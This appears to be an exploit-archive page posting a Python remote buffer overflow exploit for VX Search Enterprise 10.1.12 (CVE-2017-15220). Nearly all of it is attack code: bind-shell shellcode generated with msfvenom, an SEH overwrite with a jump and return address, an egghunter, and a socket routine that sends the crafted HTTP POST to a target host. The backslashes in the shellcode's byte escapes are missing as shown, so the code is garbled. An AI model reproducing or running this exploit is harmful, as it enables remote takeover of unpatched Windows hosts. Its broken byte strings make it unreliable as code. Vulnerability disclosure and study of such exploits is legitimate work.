Home / exploits

PDF

VX Search Enterprise 10.1.12 Buffer Overflow

Posted on 12 October 2017

#!/usr/bin/env python
# Exploit Title : VX Search Enterprise v10.1.12 Remote Buffer Overflow
# Exploit Author : Revnic Vasile
# Email : revnic[at]gmail[dot]com
# Date : 09-10-2017
# Vendor Homepage : http://www.flexense.com/
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.1.12.exe
# Version : 10.1.12
# Tested on : Windows 7 x86 Pro SP1
# Category : Windows Remote Exploit
# CVE : CVE-2017-15220

import socket
import os
import sys
import struct

# msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUN=none -e x86/alpha_mixed -f c
shellcode = ("x89xe5xdbxd3xd9x75xf4x5fx57x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x39x6cx68x68x6fx72x55x50x77x70x53x30x43x50x4d"
"x59x79x75x66x51x69x50x45x34x6cx4bx32x70x70x30"
"x4cx4bx32x72x64x4cx6ex6bx56x32x66x74x6ex6bx72"
"x52x75x78x36x6fx4ex57x33x7ax57x56x54x71x4bx4f"
"x4ex4cx65x6cx65x31x73x4cx44x42x56x4cx75x70x5a"
"x61x38x4fx36x6dx63x31x4fx37x5ax42x58x72x63x62"
"x70x57x6ex6bx42x72x44x50x4cx4bx73x7ax45x6cx6e"
"x6bx72x6cx44x51x72x58x78x63x33x78x35x51x48x51"
"x42x71x6cx4bx43x69x37x50x77x71x5ax73x4cx4bx67"
"x39x77x68x5ax43x66x5ax53x79x4ex6bx74x74x4cx4b"
"x43x31x39x46x70x31x6bx4fx6ex4cx39x51x78x4fx46"
"x6dx53x31x38x47x55x68x39x70x72x55x7ax56x33x33"
"x33x4dx4bx48x35x6bx61x6dx74x64x50x75x4ax44x31"
"x48x4cx4bx46x38x56x44x73x31x69x43x50x66x4cx4b"
"x46x6cx72x6bx4cx4bx73x68x67x6cx43x31x4bx63x4c"
"x4bx46x64x4ex6bx76x61x48x50x4cx49x71x54x34x64"
"x35x74x63x6bx71x4bx71x71x36x39x31x4ax46x31x39"
"x6fx6dx30x43x6fx73x6fx32x7ax6ex6bx74x52x68x6b"
"x6cx4dx43x6dx62x48x44x73x44x72x77x70x65x50x33"
"x58x73x47x30x73x56x52x43x6fx31x44x61x78x62x6c"
"x53x47x74x66x35x57x59x6fx4ax75x6fx48x4ex70x45"
"x51x47x70x57x70x65x79x6fx34x71x44x62x70x43x58"
"x46x49x4fx70x30x6bx53x30x59x6fx6ax75x72x4ax33"
"x38x53x69x46x30x4bx52x69x6dx73x70x32x70x51x50"
"x32x70x31x78x4ax4ax36x6fx49x4fx4bx50x39x6fx49"
"x45x4ex77x31x78x75x52x75x50x57x61x53x6cx6bx39"
"x7ax46x63x5ax54x50x71x46x32x77x43x58x6bx72x49"
"x4bx76x57x53x57x39x6fx38x55x46x37x42x48x38x37"
"x48x69x57x48x49x6fx59x6fx58x55x73x67x75x38x44"
"x34x68x6cx57x4bx69x71x59x6fx7ax75x51x47x6ex77"
"x50x68x50x75x72x4ex52x6dx51x71x6bx4fx4ax75x31"
"x78x52x43x70x6dx52x44x67x70x4fx79x78x63x71x47"
"x43x67x33x67x75x61x68x76x62x4ax55x42x70x59x56"
"x36x7ax42x59x6dx53x56x38x47x32x64x61x34x45x6c"
"x76x61x35x51x6cx4dx57x34x34x64x74x50x6bx76x43"
"x30x50x44x30x54x52x70x50x56x53x66x53x66x42x66"
"x46x36x70x4ex30x56x53x66x72x73x30x56x31x78x33"
"x49x38x4cx65x6fx4dx56x4bx4fx59x45x4bx39x79x70"
"x32x6ex73x66x33x76x6bx4fx30x30x31x78x65x58x6f"
"x77x67x6dx31x70x79x6fx38x55x6dx6bx6ax50x4ex55"
"x69x32x30x56x33x58x4cx66x4ex75x4dx6dx4dx4dx59"
"x6fx38x55x37x4cx57x76x33x4cx54x4ax6dx50x6bx4b"
"x4bx50x32x55x53x35x4dx6bx63x77x57x63x73x42x32"
"x4fx52x4ax37x70x51x43x4bx4fx58x55x41x41")

buf_totlen = 5000
dist_seh = 2492
nseh = "xebx06AA"
seh = 0x1011369e
nops = "x90" * 10

egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x77x30x30x74"
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7")

egg = "w00tw00t"

payload = ""
payload += "A"*(dist_seh - len(payload))
payload += nseh
payload += struct.pack("<I", seh)
payload += nops
payload += egghunter
payload += egg
payload += shellcode
payload += "D"*(buf_totlen - len(payload))

buf = "POST /../%s HTTP/1.1
" %payload
buf += "Host: 10.10.10.10
"
buf += "User-Agent: Mozilla/5.0
"
buf += "Connection: close
"
buf += "
"

print "Sending the payload!"
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("10.10.10.10", 80))
expl.send(buf)
expl.close()

 

TOP